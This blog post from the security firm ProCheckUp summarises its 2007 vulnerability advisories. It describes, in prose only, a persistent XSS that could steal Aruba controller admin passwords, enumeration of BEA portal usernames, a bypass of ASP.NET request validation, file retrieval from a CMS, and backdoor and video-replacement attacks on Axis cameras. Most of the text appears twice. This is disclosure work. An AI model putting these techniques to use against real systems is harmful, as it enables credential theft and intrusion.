A good year of vulnerability research for ProCheckUp
2007 was a very good year regarding vulnerability/security research for ProCheckUp. In fact, it was the most active year in the history of the company for carrying out research.
A high number of advisory bulletins were published (20 in total), and some advisories feature more than one security vulnerability!
Having established a good relationship with the vendors who produce the software affected by the vulnerabilities we found, we managed to get mentioned on several high-profile vendor sites.
ie:
BEA Systems:
http://dev2dev.bea.com/pub/advisory/251
http://dev2dev.bea.com/pub/advisory/252
http://dev2dev.bea.com/pub/advisory/254
Aruba Networks:
http://arubanetworks.com/support/alerts/aid-070907b.asc
Microsoft:
http://www.microsoft.com/technet/security/Bulletin/MS07-040.mspx
Blue Coat Systems:
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
lso on smaller vendor sites such as:
http://tincan.co.uk/?lid=1975
And recently, in early 2008, also SUN:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103180-1
Although some of the issues we have found are very common vanilla (non-persistent) XSS vulnerabilities, we have also found some quite interesting issues. The following are a few of them.
Aruba Aruba 800 Mobility Controller Admin Login Page Hack
We found a HIGH risk persistent XSS on Aruba 800 Mobility Controller. This attack is very powerful as the attacker can modify the admin login page by simply requesting a specially-crafted URL of the target controller device. For example, the attacker could modify the login page so that when the legitimate admin user logs in, his/her password is sent to a third-party site where it is logged by the attacker.
The beauty of this attack is that the vulnerable device is the "controller" of the entire Wi-Fi network. In other words, if you own the controller, you own the entire Wi-Fi network.
It's worth mentioning that although non-technical users might not be familiar with products from Aruba Networks, their products are very commonly used in high profile enterprise Wi-Fi networks.
Several information disclosure issues on BEA Portals including
extraction of all portal usernames by unauthenticated users
We found that BEA AquaLogic Interaction and BEA Plumtree Foundation Portals allow attackers to obtain all the usernames of the target portal, including those with full administrative privileges.
Once an attacker compiles a list of existing usernames, he/she can mount a password cracking attack, which is exactly how we accomplished gaining access to a BEA portal during a penetration test.
Plumtree and AquaLogic portals are very widely used not only on Intranet, but also on Internet-facing sites (almost 400,000 results in Google).
ASP .NET request validation bypass
The ASP .NET is considered to be a very secure framework for building web applications. One of its star features is known as ValidateRequest, which is a built-in filter that makes attacks such as XSS much more difficult.
However, we demonstrated how to bypass such filter which allows us to accomplish a fully exploitable XSS condition in many cases. This is obviously an accomplishment we're quite proud of!
Critical vulnerabilities on Absolute News Manager.NET CMS
Absolute News Manager.NET is a CMS (Content Management System) used by companies who need to update their websites regularly in an easy manner.
We found several HIGH risk vulnerabilities, including a file retrieval vulnerability that allows attackers to gain access to any files located on the target server. When we found this vulnerability during a pentest, we demonstrated how we could read the contents of the file containing all the database server settings (server name, username, password, etc ...).
Provided that the database server is visible from the Internet, this would allow an attacker to gain full access to the back-end database server.
Reading the source code of server-side scripts is also possible with this vulnerability.
Multiple vulnerabilities on Axis IP cameras
We found several vulnerabilities on Axis IP cameras, which are - among
other things - used for surveillance purposes. One of the highlights of
our paper Owning Big Brother is a demo exploit that allows an attacker to fully compromise
the device when an admin user checks the camera logs!
We included lots of demo attacks/payloads, including stealing the passwords file, and adding a new backdoor account that have full privileges on the system.
The demo attack which was most welcomed in the security community was replacing the video stream. This attack is just like the technique popularized by Hollywood movies in which the attacker changes the video stream, with a looping video clip, in order to bypass the survelliance system of a building.
Well, those were the highlights of our research for the year 2007. As you can see we've kept ourselves pretty busy! Stay tuned for some new coming cutting edge research in 2008!
A high number of advisory bulletins were published (20 in total), and some advisories feature more than one security vulnerability!
Having established a good relationship with the vendors who produce the software affected by the vulnerabilities we found, we managed to get mentioned on several high-profile vendor sites.
ie:
BEA Systems:
http://dev2dev.bea.com/pub/advisory/251
http://dev2dev.bea.com/pub/advisory/252
http://dev2dev.bea.com/pub/advisory/254
Aruba Networks:
http://arubanetworks.com/support/alerts/aid-070907b.asc
Microsoft:
http://www.microsoft.com/technet/security/Bulletin/MS07-040.mspx
Blue Coat Systems:
http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
lso on smaller vendor sites such as:
http://tincan.co.uk/?lid=1975
And recently, in early 2008, also SUN:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-103180-1
Although some of the issues we have found are very common vanilla (non-persistent) XSS vulnerabilities, we have also found some quite interesting issues. The following are a few of them.
Aruba Aruba 800 Mobility Controller Admin Login Page Hack
We found a HIGH risk persistent XSS on Aruba 800 Mobility Controller. This attack is very powerful as the attacker can modify the admin login page by simply requesting a specially-crafted URL of the target controller device. For example, the attacker could modify the login page so that when the legitimate admin user logs in, his/her password is sent to a third-party site where it is logged by the attacker.
The beauty of this attack is that the vulnerable device is the "controller" of the entire Wi-Fi network. In other words, if you own the controller, you own the entire Wi-Fi network.
It's worth mentioning that although non-technical users might not be familiar with products from Aruba Networks, their products are very commonly used in high profile enterprise Wi-Fi networks.
Several information disclosure issues on BEA Portals including
extraction of all portal usernames by unauthenticated users
We found that BEA AquaLogic Interaction and BEA Plumtree Foundation Portals allow attackers to obtain all the usernames of the target portal, including those with full administrative privileges.
Once an attacker compiles a list of existing usernames, he/she can mount a password cracking attack, which is exactly how we accomplished gaining access to a BEA portal during a penetration test.
Plumtree and AquaLogic portals are very widely used not only on Intranet, but also on Internet-facing sites (almost 400,000 results in Google).
ASP .NET request validation bypass
The ASP .NET is considered to be a very secure framework for building web applications. One of its star features is known as ValidateRequest, which is a built-in filter that makes attacks such as XSS much more difficult.
However, we demonstrated how to bypass such filter which allows us to accomplish a fully exploitable XSS condition in many cases. This is obviously an accomplishment we're quite proud of!
Critical vulnerabilities on Absolute News Manager.NET CMS
Absolute News Manager.NET is a CMS (Content Management System) used by companies who need to update their websites regularly in an easy manner.
We found several HIGH risk vulnerabilities, including a file retrieval vulnerability that allows attackers to gain access to any files located on the target server. When we found this vulnerability during a pentest, we demonstrated how we could read the contents of the file containing all the database server settings (server name, username, password, etc ...).
Provided that the database server is visible from the Internet, this would allow an attacker to gain full access to the back-end database server.
Reading the source code of server-side scripts is also possible with this vulnerability.
Multiple vulnerabilities on Axis IP cameras
We found several vulnerabilities on Axis IP cameras, which are - among
other things - used for surveillance purposes. One of the highlights of
our paper Owning Big Brother is a demo exploit that allows an attacker to fully compromise
the device when an admin user checks the camera logs!
We included lots of demo attacks/payloads, including stealing the passwords file, and adding a new backdoor account that have full privileges on the system.
The demo attack which was most welcomed in the security community was replacing the video stream. This attack is just like the technique popularized by Hollywood movies in which the attacker changes the video stream, with a looping video clip, in order to bypass the survelliance system of a building.
Well, those were the highlights of our research for the year 2007. As you can see we've kept ourselves pretty busy! Stay tuned for some new coming cutting edge research in 2008!
0 Comments:
Post a Comment
<< Home